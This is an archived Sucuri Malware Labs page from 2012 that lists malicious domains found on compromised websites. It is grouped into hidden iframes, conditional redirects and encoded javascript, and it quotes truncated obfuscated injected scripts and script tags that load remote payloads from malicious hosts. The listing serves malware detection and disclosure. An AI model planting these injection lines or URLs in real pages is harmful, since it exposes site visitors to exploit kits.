Sucuri Malware Labs

Sucuri on Twitter Sucuri on Facebook Sucuri on LinkedIn

Historic malware entries for 2012-07-10Home  |  Notes  |  Malware data  |  Signatures  |  Tools  |  About

      Archived data:   Latest   |   2013-05-19   |   2013-05-15   |   2013-05-14   |   2013-05-13   |   2013-05-12   |   2013-05-07   |   2013-05-02   |   2013-05-01   |   More days

We separate the data in three categories: Iframes, redirectiors and javascript. For each one you can click on the domain for more information, IP addresses and details on the malware.

Hidden iframes

Latest hidden iframes our scanner have identified on compromised web sites.

# of sites infectedTypeMalware / Domains
5474iframehttp://poseyhumane.org/stats.php
219iframehttp://goldensmagnetic.com/in.cgi?16
185iframehttp://opticmoxie.com/detailPages/stats.php
167iframehttp://flipsphere.ru/in.cgi?16
102iframehttp://scriptslimit.info/in.cgi?16
82iframehttp://oxsanasiberians.com/downloads/stats.php
36iframehttp://cabaniaseleden.com.ar/stats.php
33iframehttp://31.184.242.81/link.php
24iframehttp://sochi-led.ru/go.php?sid=1
19iframehttp://creativeironart.net/images/stats.php
18iframehttp://pahgawks.com/download/stats.php
12iframehttp://allsecureinfo.com/in.cgi?16
11iframehttp://ineed.co.nz/adverts/media.php
10iframehttp://synga.ru/wp-content/
10iframehttp://grabmale-junkert.de/c.php
8iframehttp://smuss.net/redirect.php
8iframehttp://faintsynthesized.info/prime.php?stream=86c52cce6104cd34
7iframehttp://pairedpixels.com/vaca/stats.php
6iframehttp://buzzcluster.ru/in.cgi?16
5iframehttp://minigametight.in/in.cgi?7
4iframehttp://clients.bluecava.com/data?p=D440F31E-EDE7-4BB2-B328-527A10AB7572
3iframehttp://hqwrestling.altervista.org/469-2/
3iframehttp://google-adsens.com/in.cgi?2
2iframehttp://p3d.in/e/Jexuc/wireonshadeless+spin/
2iframehttp://insurancetop.ru/in.cgi?16
2iframehttp://d.serve-sys.com/w/1.0/rc?cs=4fc74c47d3cb7
2iframehttp://d.serve-sys.com/w/1.0/jstag
2iframehttp://d.serve-sys.com/w/1.0/ai?auid=219139
2iframehttp://d.serve-sys.com/w/1.0/afr?auid=219139
2iframehttp://d1206.hizliresim.com/y/4/7frm5.jpg
2iframehttp://bronzesage.ru/in.cgi?16
2iframehttp://bigdeal777.com/gate.php?f=989035
1iframehttp://statik.hddizifilm.com/resimler/4757-katil-kopekbaligi-3d-turkce-altyazi-izle-hd-720p-net...
1iframehttp://sluxxqqgykewolmoli.in/in.cgi?default
1iframehttp://google-adsenc.com/in.cgi?2
1iframehttp://69.16.188.118/x9z7i7v3/cds/oldimg/posters/165/The_Lord_of_the_Rings_The_Two_Towers_5d699...
Limited view (40 rows)... Only the top entries being displayed.

Conditional redirections

Conditional redirections we have detected (based on user agents or referers).

# of sites infectedTypeMalware / Domains
499redirectionshttp://reltimes2013.ru/tujur?11
121redirectionshttp://onestopchinasource.com/catalog/stats.php
97redirectionshttp://reltimes2013.ru/tujur?11
46redirectionshttp://micristar.com/stats.php
46redirectionshttp://flipsphere.ru/in.cgi?16
38redirectionshttp://goldensmagnetic.com/in.cgi?16
36redirectionshttp://bronzesage.ru/in.cgi?16
36redirectionshttp://broadway.bee.pl/
32redirectionshttp://vlagskiper.ru/yazik?12
32redirectionshttp://scriptslimit.info/in.cgi?16
20redirectionshttp://onmouseup.info/stats.php
15redirectionshttp://pairedpixels.com/vaca/stats.php
15redirectionshttp://mediciron.ru/
15redirectionshttp://heartofpole.net/xml.php
12redirectionshttp://banjopestpatrol.in/in.cgi?13
11redirectionshttp://daliachuqimaysa.ru/gluce/index.php
10redirectionshttp://www.localwebgeek.com/wp-feeds.php
10redirectionshttp://huletydyshish.ru:8080/forum/showthread.php?page=beb2436a164c6222
10redirectionshttp://goldensmagnetic.com/in.cgi?16
10redirectionshttp://flipsphere.ru/in.cgi?16
9redirectionshttp://broadway.bee.pl/
8redirectionshttp://www.couchtarts.com/media.php
8redirectionshttp://charityairsupport.org
7redirectionshttp://www.online-open.com/
7redirectionshttp://creativeironart.net/images/stats.php
7redirectionshttp://bronzesage.ru/in.cgi?16
6redirectionshttp://wwww.888-move-stuff.com/main.php?page=3081100e9fdaf127
6redirectionshttp://vlagskiper.ru/yazik?12
6redirectionshttp://scriptslimit.info/in.cgi?16
6redirectionshttp://reltime2011.ru/frunleh?9
6redirectionshttp://duygumatbaa.com/stats.php
6redirectionshttp://cabaniaseleden.com.ar/stats.php
5redirectionshttp://tvoya-security.in/puma/index.php
5redirectionshttp://search-box.in/in.cgi?4
5redirectionshttp://kpoita.bee.pl/
5redirectionshttp://fida-talos.ru/maver?12
5redirectionshttp://buzzique.ru/in.cgi?16
4redirectionshttp://reltime-2013.ru/tujur?11
4redirectionshttp://pgeg.ru/ywqpog?8
4redirectionshttp://pairedpixels.com/vaca/stats.php
Limited view (40 rows)... Only the top entries being displayed.

Encoded javascript

Encoded javascript (redirecting to blackhole and other exploit kits) or to build a remote call.

# of sites infectedTypeMalware / Domains
154javascript<script>try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;try{bcsd=prot...
103javascript<script>var url="http://onmouseup.info/stats.php";if((navigator.userAgent.toLowerCase().indexOf...
69javascript<script>s="";h=-016/7;try{q=document.createElement("p");a=(q)?"appendC":12;q[a+"hild"](""+n);}c...
53javascript<script>s="";h=-016/7;try{q=document.createElement("p");a=(q)?"appendC":12;q[a+"hild"](""+n);}c...
36javascript<script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61...
35javascript<script>s="";try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-014/6;try{prot...
34javascript<script>s="";try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-014/6;try{prot...
26javascript<script type="text/javascript">var ipbs='79a5da2e';eval(function(p,a,c,k,e,d){e=function(c){ret...
24javascript<script type='text/javascript' src='http://danaid.org/wp-content/plugins/custom-menu/js/script....
22javascript<script src="http://mani36anmod.rr.nu/pmg.php?d=x"></script>
21javascript<script>i=0;try{prototype-5;}catch(z){fr="fromCharCode";f=[9,18,105,204,32,80,100,222,99,234,10...
20javascript<script src="http://mvuln99erabl.rr.nu/pmg.php?d=x"></script>
20javascript<script src="http://cco70con.rr.nu/pmg.php?d=x"></script>
19javascript<script src="http://hmarks91suspici.rr.nu/pmg.php?d=x"></script>
18javascript<script>try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;try{prototype...
18javascript<script src="http://tsruno44ffstru.rr.nu/pmg.php?d=x"></script>
18javascript<script src="http://iously61announ.rr.nu/pmg.php?d=x"></script>
17javascript<script src="http://urnal23istca.rr.nu/pmg.php?d=x"></script>
16javascript<script>try{prototype%2;}catch(asd){x=2;} i=0;try{prototype*5;}catch(z){fr="fromChar";f=[72,81,...
16javascript<script src="http://smo13tiv.rr.nu/pmg.php?d=x"></script>
16javascript<script src="http://mandel22iveries.rr.nu/pmg.php?d=x"></script>
16javascript<script src="http://erhapp86eningco.rr.nu/pmg.php?d=x"></script>
15javascript<script>try{prototype%2;}catch(asd){x=2;} i=0;try{prototype*5;}catch(z){fr="fromChar";f=[72,81,...
15javascript<script src="http://olo51gysu.rr.nu/pmg.php?d=x"></script>
15javascript<script src="http://hadowp04ercept.rr.nu/pmg.php?d=x"></script>
15javascript<script src="http://cessio33noutst.rr.nu/pmg.php?d=x"></script>
15javascript<script>s="";h=-016/7;try{q=document.createElement("p");a=(q)?"appendC":12;q[a+"hild"](""+n);}c...
14javascript<script src="ui/development-bundle/ui/jquery.ui.widget.js"></script>
14javascript<script src="http://ttot87allyp.rr.nu/pmg.php?d=x"></script>
14javascript<script src="http://rthea13terbre.rr.nu/pmg.php?d=x"></script>
14javascript<script src="http://posit32ionrad.rr.nu/pmg.php?d=x"></script>
14javascript<script>s="";h=-016/7;try{q=document.createElement("p");a=(q)?"appendC":12;q[a+"hild"](""+n);}c...
14javascript<script>s="";h=-016/7;try{q=document.createElement("p");a=(q)?"appendC":12;q[a+"hild"](""+n);}c...
13javascript<script src="http://act57ive.rr.nu/pmg.php?d=x"></script>
12javascript<script type="text/javascript" src="http://jsfeedget.com/js.php"></script>
12javascript<script type="text/javascript" language="javascript" src="http://www.corbrookpackaging.com//js/...
12javascript<script>s="";try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-014/6;try{prot...
12javascript<script src="http://sweepstakesandcontestsnow.com/nl.php?nnn=1"></script>
12javascript<script language="javascript" src="http://www.777seo.com/pop.php?username=rmx2012&max=1"></script>
12javascript<script language="JavaScript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt...
Limited view (40 rows)... Only the top entries being displayed.